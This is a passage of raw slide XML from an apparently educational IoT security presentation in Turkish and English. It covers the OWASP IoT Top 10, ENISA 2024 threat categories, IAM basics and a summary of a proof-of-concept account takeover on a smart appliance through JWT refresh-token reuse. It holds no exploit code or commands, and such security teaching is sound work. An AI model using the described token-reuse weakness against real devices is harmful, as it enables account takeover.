            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p2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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451500" y="305150"/>
            <a:ext cx="7292400" cy="1587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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🚀 8. Gelecek Trendleri</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="17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IoT için Zero Trust yaklaşımları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AI destekli anomaly detection</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Edge Computing &amp; güvenlik karmaşıklığı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OTA over blockchain?</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IoT cihazlar için SBOM zorunluluğu (NTIA/NIST çalışmaları)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p2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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="767550"/>
            <a:ext cx="6767700" cy="895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OWASP IoT Top 10</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ENISA IoT Threat Landscape</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NIST SP 800-213 (IoT Security Baselines)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="416150"/>
            <a:ext cx="3828600" cy="2269200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="127000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1050" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1050" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP IoT Top 10 - 2018</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1050" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is now available.</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50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I1 Weak Guessable, or Hardcoded Passwords</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I2 Insecure Network Services</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I3 Insecure Ecosystem Interfaces</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I4 Lack of Secure Update Mechanism</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I5 Use of Insecure or Outdated Components</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I6 Insufficient Privacy Protection</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I7 Insecure Data Transfer and Storage</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I8 Lack of Device Management</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I9 Insecure Default Settings</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1050" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-295275" lvl="0" marL="685800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="362B36"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1050" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="362B36"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>I10 Lack of Physical Hardening</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1050" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="362B36"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p2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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271150" y="179775"/>
            <a:ext cx="8672400" cy="4971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400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1300" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🛡 ENISA Threat Landscape 2024</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="13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 En Kritik Tehditler</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="11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Ransomware:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Çoklu şantaj teknikleriyle veri ve hizmet gaspı.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Malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Gizli işlemlerle sistemlerin gizliliğini, bütünlüğünü ve erişilebilirliğini tehdit eden zararlı yazılımlar.</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Social Engineering:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Phishing, smishing*, baiting* gibi insan hatasını sömüren aldatma taktikleri.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Smishing</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, SMS yoluyla yapılan kimlik avı saldırısıdır; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>baiting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> ise kullanıcıyı cazip bir yemle kandırarak zararlı yazılım indirmesini veya bilgi vermesini sağlamaya yönelik sosyal mühendislik saldırısıdır.)</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Veri Tehditleri:</a:t>
            </a:r>
            <a:endParaRPr b="1"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1" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Data Breach:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Kasıtlı saldırılarla veri sızdırma.</a:t>
            </a:r>
            <a:endParaRPr b="0"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1" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Data Leak:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Yanlış yapılandırma/hata kaynaklı istemsiz veri açığı.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Hizmet Reddi (DDoS):</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Servis veya altyapı kaynaklarını tüketerek erişim engelleme.</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Bilgi Manipülasyonu (FIMI):</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Değer ve süreçleri saptıran, devlet destekli veya bağımsız dezenformasyon faaliyetleri.</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 Öne Çıkan Trendler</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="11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Ransomware &amp; DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> saldırıları hâlâ en yaygın tehditler arasında.</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LOTS (Living Off Trusted Sites):</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> C2 iletişimlerini meşru servislerle gizleme (Slack, Telegram).</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LOTL (Living Off The Land):</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Sistem araçlarını kullanarak iz bırakmayan saldırı teknikleri.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Jeopolitik Faktörler:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Devlet destekli tehdit aktörleri ve siber casusluk artışı.</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1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🔗 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kaynak: ENISA Threat Landscape 2024 (Haziran 2023 – Temmuz 2024 dönemi)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="1"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>enisa.europa.eu/publications/enisa-threat-landscape</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="sng" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p2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a:t>PoC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145150" y="3128675"/>
            <a:ext cx="6501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9" name="Google Shape;209;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3584500" y="2704700"/>
            <a:ext cx="3000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rgbClr val="1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>JWT Token Reuse</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="1F1F1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133150" y="3352250"/>
            <a:ext cx="4877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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/FerdiGul/POC/tree/main/IoT-HomeDevice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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576300" y="2118600"/>
            <a:ext cx="8520600" cy="7926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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>🔍 Vulnerability Summary</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type: Account Takeover (ATO)</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CWE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CWE-287</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Improper Authentication</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**Estimated CVSS from HIGH to CRITICAL</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Test Date: 2025-05-10</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Environment: iOS Device + Burp Suite</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Target Device: IoT Smart Appliance (e.g., Washer)</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Network Context: Internal Wi-Fi, Proxy Server</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="216" name="Google Shape;216;p30" title="IoT workflow.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575200" y="451076"/>
            <a:ext cx="5469650" cy="1711925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1032125" y="4151100"/>
            <a:ext cx="7909800" cy="10596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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The same refresh token was reused 100 times in one hour, each time successfully returning new credentials and exposing sensitive data.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;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31" title="ChatGPT Image May 28, 2025 at 11_19_30 PM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154650" y="192250"/>
            <a:ext cx="4758999" cy="4758999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5056925" y="146025"/>
            <a:ext cx="4022400" cy="4654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IAM (Identity and Access Management) Nedir?</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Kullanıcıların kimliğini doğrulayan ve sistem kaynaklarına erişimlerini yöneten güvenlik mekanizmasıdır.</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 Ne İşe Yarar?</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="11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Kullanıcıların </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>kim olduğunu doğrular</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (authentication)</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Her kullanıcıya sadece </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ihtiyacı olan erişimi verir</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (authorization)</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Erişimleri </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>kaydeder, izler ve denetler</a:t>
            </a:r>
            <a:endParaRPr b="1"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Kullanıcı yaşam döngüsünü yönetir</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (oluşturma, yetki verme, silme)</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Güvenlik, gizlilik ve yasal uyumluluğu sağlar</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4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Ne Yapar?</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="11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Şifre, MFA, biyometrik gibi yöntemlerle </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>giriş güvenliği sağlar</a:t>
            </a:r>
            <a:endParaRPr b="1"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Roller ve politikalarla </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
